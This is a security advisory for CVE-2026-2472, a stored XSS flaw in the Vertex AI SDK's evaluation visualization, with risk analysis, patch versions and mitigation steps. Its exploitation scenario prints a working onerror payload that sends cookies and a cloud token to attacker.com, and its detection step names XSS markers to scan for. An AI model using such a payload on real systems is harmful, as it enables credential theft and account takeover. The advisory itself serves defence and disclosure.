CVE-2026-2472: google-cloud-aiplatform: XSS enables session hijacking

GHSA-qv8j-hgpc-vrq8 HIGH
Published February 20, 2026
CISO Take

If your ML engineers use Vertex AI SDK's evaluation visualization in Jupyter or Colab, upgrade google-cloud-aiplatform to 1.131.0 immediately. An attacker who can influence model evaluation inputs or dataset content can execute arbitrary JavaScript in your engineers' browser sessions, enabling cloud credential theft and account takeover. Risk is highest for teams evaluating LLMs against external, user-supplied, or third-party data sources—a public PoC already exists on GitHub.

Risk Assessment

High business impact despite low EPSS (0.00064) and no CISA KEV inclusion. Jupyter and Colab environments are disproportionately dangerous XSS targets: they routinely hold Google Cloud OAuth tokens, service account keys, and direct access to production data pipelines and model artifacts. The attack requires no authentication—only the ability to influence evaluation dataset content or model outputs, which is achievable via adversarial prompts, poisoned datasets, or indirect prompt injection into evaluated models. A public PoC (github.com/JoshuaProvoste/CVE-2026-2472-Vertex-AI-SDK-Google-Cloud) lowers the exploitation bar further. No confirmed active exploitation in the wild as of analysis date.

Affected Systems

Package Ecosystem Vulnerable Range Patched
google-cloud-aiplatform pip >= 1.98.0, < 1.131.0 1.131.0

Do you use google-cloud-aiplatform? You're affected.

Severity & Risk

CVSS 3.1
N/A
EPSS
0.1%
chance of exploitation in 30 days
Higher than 25% of all CVEs
Exploitation Status
No known exploitation
Sophistication
Moderate

Recommended Action

6 steps
  1. PATCH (immediate): Upgrade google-cloud-aiplatform to >= 1.131.0 — pip install --upgrade google-cloud-aiplatform. Verify with pip show google-cloud-aiplatform.

  2. WORKAROUND

    Until patched, prohibit use of _genai/_evals_visualization with evaluation results sourced from untrusted, external, or user-supplied data.

  3. DETECTION

    Scan evaluation datasets and model outputs for script tags, JavaScript event handlers (onerror, onload, onclick), and javascript: URI schemes before visualization. Add pre-render output sanitization.

  4. INPUT CONTROL

    Treat all external data sources fed into evaluation pipelines as untrusted; apply allowlist-based content validation.

  5. CREDENTIAL HYGIENE

    If exposure is suspected, rotate Google Cloud service account keys, OAuth tokens, and API keys stored in any potentially affected Jupyter/Colab sessions.

  6. SCOPE

    Check all repositories and CI/CD pipelines that run evaluation notebooks for the vulnerable SDK version range.

CISA SSVC Assessment

Decision Track
Exploitation none
Automatable No
Technical Impact total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act
Art. 15 - Accuracy, robustness and cybersecurity Article 15 - Accuracy, Robustness and Cybersecurity
ISO 42001
A.6.2.3 - AI system inputs A.6.2.6 - AI System Security A.8.4 - AI Data Quality and Integrity
NIST AI RMF
GOVERN 6.1 - Policies and procedures are in place that address AI risks associated with third-party entities MANAGE 2.2 - Mechanisms are in place and applied to sustain the value of deployed AI systems MANAGE-2.2 - Mechanisms to respond to AI risks
OWASP LLM Top 10
LLM02 - Insecure Output Handling LLM02:2025 - Insecure Output Handling

Frequently Asked Questions

What is CVE-2026-2472?

If your ML engineers use Vertex AI SDK's evaluation visualization in Jupyter or Colab, upgrade google-cloud-aiplatform to 1.131.0 immediately. An attacker who can influence model evaluation inputs or dataset content can execute arbitrary JavaScript in your engineers' browser sessions, enabling cloud credential theft and account takeover. Risk is highest for teams evaluating LLMs against external, user-supplied, or third-party data sources—a public PoC already exists on GitHub.

Is CVE-2026-2472 actively exploited?

No confirmed active exploitation of CVE-2026-2472 has been reported, but organizations should still patch proactively.

How to fix CVE-2026-2472?

1. PATCH (immediate): Upgrade google-cloud-aiplatform to >= 1.131.0 — pip install --upgrade google-cloud-aiplatform. Verify with pip show google-cloud-aiplatform. 2. WORKAROUND: Until patched, prohibit use of _genai/_evals_visualization with evaluation results sourced from untrusted, external, or user-supplied data. 3. DETECTION: Scan evaluation datasets and model outputs for script tags, JavaScript event handlers (onerror, onload, onclick), and javascript: URI schemes before visualization. Add pre-render output sanitization. 4. INPUT CONTROL: Treat all external data sources fed into evaluation pipelines as untrusted; apply allowlist-based content validation. 5. CREDENTIAL HYGIENE: If exposure is suspected, rotate Google Cloud service account keys, OAuth tokens, and API keys stored in any potentially affected Jupyter/Colab sessions. 6. SCOPE: Check all repositories and CI/CD pipelines that run evaluation notebooks for the vulnerable SDK version range.

What systems are affected by CVE-2026-2472?

This vulnerability affects the following AI/ML architecture patterns: model evaluation pipelines, AI development workspaces, Vertex AI workflows, Jupyter and Colab ML environments, LLM evaluation frameworks, automated ML pipelines with visualization.

What is the CVSS score for CVE-2026-2472?

No CVSS score has been assigned yet.

Technical Details

NVD Description

Stored Cross-Site Scripting (XSS) in the _genai/_evals_visualization component of Google Cloud Vertex AI SDK (google-cloud-aiplatform) versions from 1.98.0 up to (but not including) 1.131.0 allows an unauthenticated remote attacker to execute arbitrary JavaScript in a victim's Jupyter or Colab environment via injecting script escape sequences into model evaluation results or dataset JSON data.

Exploitation Scenario

An attacker targets a company running LLM evaluations on Vertex AI. They submit an adversarial evaluation dataset entry with a JSON string value containing a stored XSS payload: '<img src=x onerror=fetch("https://attacker.com/exfil?t="+btoa(document.cookie+localStorage.getItem("gcloud_token")))>'. The poisoned dataset is fed into a Vertex AI model evaluation job. When the ML engineer opens the _genai/_evals_visualization dashboard in Jupyter to review results, the payload fires silently, exfiltrating the engineer's Google Cloud OAuth token and session cookies to the attacker. The attacker uses the stolen token to authenticate to GCS, enumerate Vertex AI model artifacts, and pivot to Cloud SQL or BigQuery—all without triggering authentication alerts, since they are using a legitimate token.

Timeline

Published
February 20, 2026
Last Modified
February 27, 2026
First Seen
March 24, 2026

Related Vulnerabilities